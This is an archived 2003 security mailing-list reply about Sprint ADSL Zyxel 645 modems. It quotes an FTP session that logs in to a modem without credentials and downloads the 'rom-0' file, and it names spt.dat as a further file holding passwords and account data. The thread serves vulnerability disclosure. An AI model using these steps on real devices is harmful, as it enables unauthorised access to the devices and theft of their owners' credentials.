Re: SPRINT ADSL [Zyxel 645 Series Modem]

From: FX (fxat_private)
Date: Fri Jan 24 2003 - 04:13:39 PST

Next message: mindwarperat_private: "Another YabbSE Remote Code Execution Vulnerability"

Previous message: xss-is-lameat_private: "[VulnWatch] Re: New Web Vulnerability - Cross-Site Tracing"
Maybe in reply to: http-equivat_private: "SPRINT ADSL [Zyxel 645 Series Modem]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> ftp> open malware.com
> Connected to malware.com.
> 220 Sprint FTP version 1.0 ready at Wed Jan  5 17:20:47 2000
> User (malware.com:(none)):
> 331 Enter PASS command
> Password:
> 230 Logged in
> ftp> get rom-0

I'm not sure if this applies to the Zyxel boxes you found, but there is another
file called spt.dat, which contains all password and account information. More
details can be found here: http://www.DarkLab.org/archive/msg00144.html

FX

-- 
         FX           <fxat_private>
      Phenoelit   (http://www.phenoelit.de)
672D 64B2 DE42 FCF7 8A5E E43B C0C1 A242 6D63 B564

Next message: mindwarperat_private: "Another YabbSE Remote Code Execution Vulnerability"
Previous message: xss-is-lameat_private: "[VulnWatch] Re: New Web Vulnerability - Cross-Site Tracing"
Maybe in reply to: http-equivat_private: "SPRINT ADSL [Zyxel 645 Series Modem]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jan 24 2003 - 06:24:53 PST